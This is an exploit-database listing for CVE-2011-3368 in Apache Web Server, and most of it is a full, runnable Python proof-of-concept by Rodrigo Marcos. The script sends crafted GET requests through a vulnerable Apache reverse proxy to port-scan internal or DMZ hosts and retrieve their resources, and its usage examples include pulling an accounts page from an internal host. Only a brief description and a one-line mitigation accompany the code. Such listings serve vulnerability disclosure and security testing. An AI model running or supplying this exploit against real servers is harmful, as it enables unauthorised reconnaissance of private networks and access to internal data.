header-logo
Suggest Exploit
vendor:
Apache Web Server
by:
Rodrigo Marcos
2.6
CVSS
LOW
Apache Scanning
287
CWE
Product Name: Apache Web Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: CVE-2011-3368
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-0021/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-0053/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0323/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0128/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-0031/https://www.rapid7.com/db/vulnerabilities/apple-osx-note-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-3639/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2011-3639/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/apple-osx-apache-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2011-3639/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-3639/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2011-4317/https://www.rapid7.com/db/vulnerabilities/apple-osx-note-cve-2011-3368/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-3368/https://www.rapid7.com/db/?q=CVE-2011-3368&type=&page=2https://www.rapid7.com/db/?q=CVE-2011-3368&type=&page=2
Other Scripts: https://www.infosecmatter.com/nmap-nse-library/?nse=http-vuln-cve2011-3368https://www.infosecmatter.com/nessus-plugin-library/?id=56972https://www.infosecmatter.com/nessus-plugin-library/?id=77326https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/rewrite_proxy_bypasshttps://www.infosecmatter.com/nessus-plugin-library/?id=62214https://www.infosecmatter.com/nessus-plugin-library/?id=80192https://www.infosecmatter.com/nessus-plugin-library/?id=68377https://www.infosecmatter.com/nessus-plugin-library/?id=59678https://www.infosecmatter.com/nessus-plugin-library/?id=58252https://www.infosecmatter.com/nessus-plugin-library/?id=58811
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2011

Apache Scan

Apache Scanning is a technique used to scan the ports of a remote host using an Apache web server. It is done by sending a GET request to the Apache server with the target host and port as parameters. The response from the server will indicate whether the port is open, closed, or filtered.

Mitigation:

Disable the Apache server or configure it to only allow requests from trusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/env python

import socket
import string
import getopt, sys


known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):

	get = "GET " + url + "@" + internal_target + ":" + internal_port +  "/" + resource + " HTTP/1.1\r\n"
	get = get + "Host: " + apache_target + "\r\n\r\n"
	
	remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	remoteserver.settimeout(3)

	try:
		remoteserver.connect((apache_target, int(apache_port)))
		remoteserver.send(get)
		return remoteserver.recv(4096)
	except:
		return ""

def get_banner(result):
	return result[string.find(result, "\r\n\r\n")+4:]


def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):

	print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
	for port in tested_ports:
		port = str(port)
		result = send_request(url, apache_target, apache_port, internal_target, port, resource)
		if string.find(result,"HTTP/1.1 200")!=-1 or \
		string.find(result,"HTTP/1.1 30")!=-1 or \
		string.find(result,"HTTP/1.1 502")!=-1:
			print "- Open port: " + port + "/TCP"
			print get_banner(result)
		elif len(result)==0:
	 		print "- Filtered port: " + port + "/TCP"
		else:
	 		print "- Closed port: " + port + "/TCP"
			

def usage():
	print
	print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
	print "http://www.secforce.co.uk"
	print
	print "usage():"
	print "python apache_scan.py [options]"
	print
	print " [options]"
	print "		-r: Remote Apache host"
	print "		-p: Remote Apache port (default is 80)"
	print "		-u: URL on the remote web server (default is /)"
	print "		-d: Host in the DMZ (default is 127.0.0.1)"
	print "		-e: Port in the DMZ (enables 'single port scan')"
	print "		-g: GET request to the host in the DMZ (default is /)"
	print "		-h: Help page"
	print
	print "examples:"
	print " - Port scan of the remote host"
	print "		python apache_scan.py -r www.example.com -u /images/test.gif"
	print " - Port scan of a host in the DMZ"
	print "		python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
	print " - Retrieve a resource from a host in the DMZ"
	print "		python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
	print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
	print
	print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
	print "http://www.secforce.co.uk"
	print
	print " [+] Target: " + apache_target
	print " [+] Target port: " + apache_port
	print " [+] Internal host: " + internal_target
	print " [+] Tested ports: " + str(tested_ports)
	print " [+] Internal resource: " + resource
	print


def main():

	global apache_target
	global apache_port
	global url
	global internal_target
	global internal_port
	global resource

	try:
		opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
	except getopt.GetoptError:
		usage()
		sys.exit(2)

	try:
		for o, a in opts:
			if o in ("-h", "--help"):
				usage()
				sys.exit(2)
			if o == "-u":
				url=a
			if o == "-r":
				apache_target=a
			if o == "-p":
				apache_port=a
			if o == "-d":
				internal_target = a
			if o == "-e":
				internal_port=a
			if o == "-g":
				resource=a				
		
	except getopt.GetoptError:
		usage()
		sys.exit(2)
		
	if apache_target == "":
		usage()
		sys.exit(2)


url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"

main()

if internal_port!="":
	tested_ports = [internal_port]
else:
	tested_ports = known_ports

scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)

Navigation

Suggest Exploit

Services By CQR